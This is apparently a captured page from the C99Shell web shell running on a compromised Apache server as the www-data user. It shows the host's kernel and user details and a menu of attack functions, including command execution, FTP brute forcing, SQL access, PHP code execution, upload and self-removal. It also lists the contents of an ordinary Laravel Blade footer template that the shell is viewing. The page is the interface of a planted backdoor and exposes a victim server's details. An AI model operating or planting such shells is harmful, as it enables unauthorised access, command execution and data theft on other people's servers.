!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/resources/views/components/   drwxr-xr-x
Free 13.31 GB of 57.97 GB (22.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     load_footer.blade.php (1.13 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@if(filter_var(domain_info('custom_js')) == true)
@if(file_exists('uploads/'.domain_info('user_id').'/additional.js'))
<script src="{{ asset('uploads/'.domain_info('user_id').'/additional.js') }}"></script>
@endif
@endif




@if(filter_var(domain_info('google_analytics')) == true)
@if(Cache::has(domain_info('user_id').'google-analytics'))
@php
$google_analytics=json_decode(Cache::get(domain_info('user_id').'google-analytics'));
@endphp
{!! google_analytics($google_analytics->ga_measurement_id ?? 1234) !!}
@endif

@endif

@if(filter_var(domain_info('gtm')) == true)
@if(Cache::has(domain_info('user_id').'tag_manager'))
@php
$tag_manager=Cache::get(domain_info('user_id').'tag_manager');
@endphp
{!! google_tag_manager_footer($tag_manager ?? 1234) !!}
@endif
@endif


@if(filter_var(domain_info('pwa')) == true)
@if(file_exists('uploads/'.domain_info('user_id').'/manifest.json'))
<script type="text/javascript">
        window.onload = () => {
              'use strict';
              if ('serviceWorker' in navigator) {
                 navigator.serviceWorker.register('/sw.js?v=1.0');
               
            }
        }

</script>
@endif
@endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--